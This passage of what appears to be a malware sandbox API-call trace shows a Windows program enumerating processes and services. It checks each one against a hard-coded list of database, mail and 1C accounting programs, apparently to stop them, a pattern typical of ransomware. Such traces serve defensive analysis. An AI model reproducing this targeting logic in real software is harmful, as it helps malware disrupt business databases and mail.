lpString2="ProfSvc") returned 1 [0256.994] lstrlenW (lpString="RpcEptMapper") returned 12 [0256.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0256.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0256.994] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0256.994] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0256.994] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0256.994] lstrlenW (lpString="RpcSs") returned 5 [0256.994] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0256.994] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0256.994] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0256.995] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0256.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0256.995] lstrlenW (lpString="SamSs") returned 5 [0256.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0256.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0256.995] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0256.995] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0256.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0256.995] lstrlenW (lpString="Schedule") returned 8 [0256.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0256.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0256.995] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0256.995] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0256.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0256.995] lstrlenW (lpString="SENS") returned 4 [0256.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0256.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0256.995] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0256.995] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0256.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0256.995] lstrlenW (lpString="ShellHWDetection") returned 16 [0256.995] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0256.995] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0256.995] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0256.995] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0256.995] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0256.995] lstrlenW (lpString="Spooler") returned 7 [0256.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0256.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0256.996] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0256.996] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0256.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0256.996] lstrlenW (lpString="SysMain") returned 7 [0256.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0256.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0256.996] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0256.996] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0256.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0256.996] lstrlenW (lpString="Themes") returned 6 [0256.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0256.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0256.996] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0256.996] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0256.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0256.996] lstrlenW (lpString="UxSms") returned 5 [0256.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0256.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0256.996] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0256.996] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0256.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0256.996] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0256.996] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3b8 [0256.997] Process32FirstW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.998] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0256.998] lstrlenW (lpString="System") returned 6 [0256.998] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0256.998] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0256.998] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0256.998] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0256.998] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0256.998] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0256.998] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0256.998] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0256.998] lstrlenW (lpString="smss.exe") returned 8 [0256.998] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0256.998] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0256.998] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0256.998] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0256.998] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0256.998] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0256.999] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0256.999] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.999] lstrlenW (lpString="csrss.exe") returned 9 [0256.999] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0256.999] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0256.999] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0256.999] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0256.999] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0256.999] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0256.999] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0256.999] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0256.999] lstrlenW (lpString="wininit.exe") returned 11 [0256.999] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0256.999] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0256.999] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0256.999] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0256.999] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0256.999] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0256.999] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0256.999] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.000] lstrlenW (lpString="csrss.exe") returned 9 [0257.000] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0257.000] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0257.000] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0257.000] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0257.000] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0257.000] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0257.000] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0257.000] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0257.000] lstrlenW (lpString="winlogon.exe") returned 12 [0257.000] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0257.000] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0257.000] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0257.000] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0257.000] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0257.000] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0257.000] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0257.000] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0257.001] lstrlenW (lpString="services.exe") returned 12 [0257.001] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0257.001] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0257.001] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0257.001] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0257.001] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0257.001] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0257.001] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0257.001] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0257.001] lstrlenW (lpString="lsass.exe") returned 9 [0257.001] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0257.001] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0257.001] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0257.001] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0257.001] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0257.001] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0257.001] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0257.001] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0257.002] lstrlenW (lpString="lsm.exe") returned 7 [0257.002] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0257.002] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0257.002] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0257.002] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0257.002] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0257.002] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0257.002] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0257.002] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.002] lstrlenW (lpString="svchost.exe") returned 11 [0257.002] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0257.002] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0257.002] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0257.002] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0257.002] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0257.002] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0257.002] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0257.002] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.002] lstrlenW (lpString="svchost.exe") returned 11 [0257.002] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0257.003] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.003] lstrlenW (lpString="svchost.exe") returned 11 [0257.003] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0257.003] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.003] lstrlenW (lpString="svchost.exe") returned 11 [0257.003] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0257.003] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0257.004] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0257.004] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0257.004] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.004] lstrlenW (lpString="svchost.exe") returned 11 [0257.004] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0257.004] lstrlenW (lpString="audiodg.exe") returned 11 [0257.004] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.004] lstrlenW (lpString="svchost.exe") returned 11 [0257.005] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.005] lstrlenW (lpString="svchost.exe") returned 11 [0257.005] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0257.005] lstrlenW (lpString="userinit.exe") returned 12 [0257.005] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0257.005] lstrlenW (lpString="dwm.exe") returned 7 [0257.005] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0257.006] lstrlenW (lpString="explorer.exe") returned 12 [0257.006] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.006] lstrlenW (lpString="spoolsv.exe") returned 11 [0257.006] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.006] lstrlenW (lpString="taskhost.exe") returned 12 [0257.006] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.006] lstrlenW (lpString="svchost.exe") returned 11 [0257.006] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0257.007] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0257.007] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0257.007] lstrlenW (lpString="reader_sl.exe") returned 13 [0257.007] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0257.007] CloseHandle (hObject=0x3b8) returned 1 [0257.007] Sleep (dwMilliseconds=0x1f4) [0257.883] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea2b8 [0257.904] EnumServicesStatusExW (in: hSCManager=0x47ea2b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0257.904] GetLastError () returned 0xea [0257.904] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dec5a0 [0257.904] EnumServicesStatusExW (in: hSCManager=0x47ea2b8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0257.905] CloseServiceHandle (hSCObject=0x47ea2b8) returned 1 [0257.905] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0257.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0257.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0257.905] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0257.905] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0257.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0257.905] lstrlenW (lpString="AudioSrv") returned 8 [0257.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0257.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0257.905] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0257.905] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0257.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0257.905] lstrlenW (lpString="BFE") returned 3 [0257.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0257.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0257.905] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0257.906] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0257.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0257.906] lstrlenW (lpString="CryptSvc") returned 8 [0257.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0257.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0257.906] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0257.906] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0257.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0257.906] lstrlenW (lpString="CscService") returned 10 [0257.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0257.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0257.906] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0257.906] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0257.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0257.906] lstrlenW (lpString="DcomLaunch") returned 10 [0257.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0257.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0257.906] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0257.906] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0257.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0257.906] lstrlenW (lpString="Dhcp") returned 4 [0257.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0257.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0257.906] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0257.906] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0257.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0257.906] lstrlenW (lpString="Dnscache") returned 8 [0257.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0257.906] 